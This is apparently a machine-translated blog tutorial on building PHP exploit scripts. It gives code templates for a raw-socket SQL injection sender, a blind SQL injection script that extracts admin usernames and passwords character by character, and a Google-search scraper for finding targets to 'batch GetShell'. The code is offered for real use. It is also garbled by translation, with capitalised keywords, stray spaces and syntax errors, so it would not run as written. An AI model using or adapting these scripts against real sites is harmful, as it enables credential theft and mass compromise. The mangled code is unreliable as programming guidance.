Compilation of Exploit framework for general PHP

0 × 01 Preface
With the advent of the era of no conventional vulnerabilities, many popular injection testing tools on the market are unable to cope with unconventional injection points, the flexibility of scripts makes it easy to test these unconventional injection points. The most common application is to use scripts to forward HTTP packets and inject them with injection testing tools. Today, I want to discuss the compilation of PHP Exp, which can be used directly to inject or batch GetShell.
 
0 × 02 PHP WinSock Function
PHP is powerful and easy to use. His extension library has encapsulated Winsock functions. We usually use fsockopen, fwrite, fgets, fgetss, fclose, feof, etc. usually Exp gets the Administrator's account through injection, so a process can be roughly abstracted as follows:
1. Output Usage and other information
2. Construct Data Packets
3. Send packets cyclically
4. Get the result and output it.
Let's talk about it using code.
 
PHP code
<? Php
// You can modify the script timeout and Error Reporting as needed.
Error_reporting (E_ERROR );
Set_time_limit (0 );
 
// Output copyright information, which is optional
Print_r ('
---------------------------
Xxxxxxx SQL injection
Xxxxxxx exploit
BY xxxxxx
---------------------------
');
 
// Usually, Exp is input in the command line to accept parameters.
If ($ argc <3 ){
// $ Argc indicates the length of the accepted parameter, usually three. The $ argv array is the value of the stored parameter. The first element of $ argv [0] indicates the file name.
Print_r ('
---------------------------
Usage: php '. $ argv [0]. 'Host path
Host: target server (ip/hostname), without "http ://"
Path: path to phpcms
Example:
Php '. $ argv [0]. 'localhost/
---------------------------
');
Die;
}
 
// The parameter value is also modified as needed.
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Html = '';
 
// Construct a data packet
$ Cookie = "";
$ Agent = "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv: 5.0.1) Gecko/20100101 Firefox/5.0.1 ";
$ Content = "";
// The method for injecting and sending packets, sometimes GET or POST.
$ Data = "POST/xxxxxx/bug. php? Aid = 1 HTTP/1.1 \ r \ n ";
$ Data. = "Host:". $ host. "\ r \ n ";
// $ Data. = "Cookie:". $ cookie. "\ r \ n ";
$ Data. = "User-Agent:". $ agent. "\ r \ n ";
$ Data. = "Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 \ r \ n ";
$ Data. = "Accept-Language: zh-cn, zh; q = 0.5 \ r \ n ";
// $ Data. = "Accept-Encoding: gzip, deflate \ r \ n ";
// Some websites may have enabled Gzip compression, which can be obtained through the packet capture tool during the test, such as Live Http.
$ Data. = "Accept-Charset: GB2312, UTF-8; q = 0.7, *; q = 0.7 \ r \ n ";
$ Data. = "Connection: keep-alive \ r \ n ";
$ Data. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
$ Data. = "Content-Length:". strlen ($ content). "\ r \ n ";
$ Data. = $ content. "\ r \ n ";
 
// Send packets
Sendpack ($ data );
 
// All returned results will exist in the $ html variable, which is a string. In this case, use the regular expression or string judgment function to obtain the result.
If (! Eregi ("created_time", $ html )){
Echo $ packet. "\ r \ n ";
Echo $ html. "\ r \ n ";
Die ("Exploit failed... ");
} Else {
$ Pattern = "";
Preg_match ($ pattern, $ html, $ pg );
// $ Html =
// Some judgments on $ html after searching .....
Echo "\ r \ nExploit succeeded... \ R \ n ";
}
 
 
// Encapsulate the packet sending function www.2cto.com
Function sendpack ($ packet)
{
Global $ host, $ html;
$ Ock = fsockopen (gethostbyname ($ host), '80 ');
If (! $ Ock ){
Echo 'no response from '. $ host; die;
}
Fputs ($ ock, $ packet );
$ Html = '';
While (! Feof ($ ock )){
$ Html. = fgets ($ ock );
}
Fclose ($ ock );
}
 
?> 0 × 03 application of CURL Library
In addition to the Winsock function, PHP also comes with a more powerful CURL library, so it can do more. Let's talk about the Code directly. For more CURL applications, refer to its official documentation.
 
PHP code
<? Php
Set_time_limit (0 );
 
// Obtain parameters
$ Url = $ argv [1];
$ Id = $ argv [2];
$ Opt = $ argv [3];
 
// Output prompt
If (count ($ argv )! = 4 ){
Print_r ('
Xxxxxxxxx SQL Injection
')
} Else {
 
Preg_match_all ("/content to be matched... /", GET ($ url), $ dat, PREG_SET_ORDER );
If (! $ Dat ){
Echo "failed... \ N ";
} Else {
// If there is corresponding data...
Echo "xxxx SQL Injection \ n ";
// Select an operation project, which can be used here...
If ($ opt = "-u "){
$ Var = "username ";
} Elseif ($ opt = "-p "){
$ Var = "password ";
} Else {
Echo "[+] Parametros Incorrectos \ n ";
Exit ();
}
 
Echo $ var. ": \ n ";
// 0-9, a-z is placed in the $ ansi array to prepare for guessing
$ Ansi = genera_ansii ();
// Construct an injection statement, which can be customized with $ var ..
$ Query = "select +". $ var. "+ from + admin_users + where + id =". $ id;
// Obtain the original page for injection comparison. You can also construct a keyword comparison. Here, the packet length is used to determine the number of lines in the package.
$ Original = contar ($ url );
 
// Loop guessing
$ I = 1;
For ($ x = 0; $ x <= count ($ ansi); $ x ++ ){
$ Var = $ ansi [$ x];
// Sqlexec restructured the SQL Injection statement and can be modified to a more comprehensive one. Here we use the ascii and substring functions to judge
$ Urlblind = $ url. sqlexec ($ query. "+ limit + 0, 1", $ I). $ var;
$ Blind = contar ($ urlblind );
// If the statement is successfully executed, the and 1 = 1 page is returned and the result is output.
If ($ blind ==$ original ){
$ Name. = chr ($ var );
Echo ":>". $ name. chr (8 );
$ I ++;
$ X =-1;
}
Echo chr ($ var). chr (13 );
}
Echo "\ nResult:>". $ name. "\ n ";
}
}
 
// Function Encapsulation
 
Function GET ($ url ){
// Initialize and construct the header, Which is omitted here ..
$ Curl = curl_init ();
$ Header [] = "";
$ Header [] = "Cache-Control: max-age = 0 ";
$ Header [] = "Connection: keep-alive ";
$ Header [] = "Keep-Alive: 300 ";
// Construct as needed ..
// Curl_setopt is used to set the CURL operation parameters ..
Curl_setopt ($ curl, CURLOPT_URL, $ url );
Curl_setopt ($ curl, CURLOPT_USERAGENT, 'user-Agent: Mozilla/5.0 (Windows NT 5.2; rv: 5.0.1) Gecko/20100101 Firefox/5.0.1 ');
Curl_setopt ($ curl, CURLOPT_HTTPHEADER, $ header );
Curl_setopt ($ curl, CURLOPT_REFERER, 'HTTP: // www.google.com ');
Curl_setopt ($ curl, CURLOPT_ENCODING, 'gzip, deflate ');
Curl_setopt ($ curl, CURLOPT_AUTOREFERER, true );
Curl_setopt ($ curl, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ curl, CURLOPT_TIMEOUT, 10 );
If (! $ Html = curl_exec ($ curl )){
$ Html = file_get_contents ($ url );
}
Curl_close ($ curl );
Return $ html;
}
 
 
Function contar ($ host ){
Return count (explode ("\ n", GET ($ host )));
}
 
 
Function sqlexec ($ SQL, $ I ){
Return "+ and + ascii (substring (". $ SQL. "),". $ I. ", 1) = ";
}
 
Function genera_ansii (){
For ($ x = 45; $ x <= 122; $ x ++) {// 0-9 a-z &&_
If ($ x = 47 ){
$ X ++;
}
If ($ x = 58 ){
$ X = $ x + 37;
}
If ($ x = 96 ){
$ X ++;
}
$ Ansi [] = $ x;
}
Return $ ansi;
}
 
?> 0 × 04 example of batch GetShell
Batch GetShell is generally suitable for RFI vulnerabilities, but here is only a small example, that is, to batch crawl Google results. In combination with the previous steps, you only need to make some necessary modifications to batch injection or GetShell.
 
PHP code
<? PHP
$ Keywords = $ argv [1];
$ Html = google ($ keywords );
$ Match = "! <Div \ s * id = \ "search \"> (. *) </div> \ s + <\! -Z->! ";
Preg_match_all ($ match, $ html, $ line );
// Print_r ($ line );
While (list ($ k, $ v) = each ($ line [0]) {
Preg_match_all ("! <H3 \ s + class = \ "r \"> <a [^>] +> (.*?) </A>! ", $ V, $ title );
$ Num = count ($ title [1]);
For ($ I = 0; $ I <$ num; $ I ++ ){
If (strstr ($ title [0] [$ I], $ url_s )){
$ J = $ I + 1;
Echo $ html;
// Echo $ url;
Break;
 
}
 
}
 
}
Unset ($ html );
 
 
Function google ($ key ){
// Search interface
$ Url = "http://www.google.com/search? Sclient = psy-AB & hl = en & site = & source = hp & q = $ key ";
// Manually capture google cookies because they will change at any time
$ Cookie_file = dirname (_ FILE _). "/googlecookies.txt ";
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, $ url );
Curl_setopt ($ ch, CURLOPT_USERAGENT, 'modify User-agent' according to the preceding script ');
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1 );
Curl_setopt ($ ch, CURLOPT_COOKIEJAR, $ cookie_file );
$ Contents = curl_exec ($ ch );
Curl_close ($ ch );
Return $ contents;
}
 
?> 0 × 05 Summary
Finally, many people think that the use of Exp requires a complete PHP environment, which is not necessary. In general, you only need to package php.exe and php5ts. you can use the Winsock function in the dll library file, but if you want to use the CURL library, you also need to include php_curl.dll and load the curl library with the PHP Command Line parameters.
The younger brother's skills are not strong, and the general nature of his writing may not be very strong. However, slight modifications to the original foundation should be applicable to actual practice. In addition, many Daniel also uses scripts to write many general SQLi tools, such as SqlMap written in Python. I think it is a trend to take advantage of step-by-step Penetration. PHP provides a lot of convenient extension libraries, which allow it to play a lot of magical effects in penetration. I will give a few words to explore.

From DarkRay's BLoG .!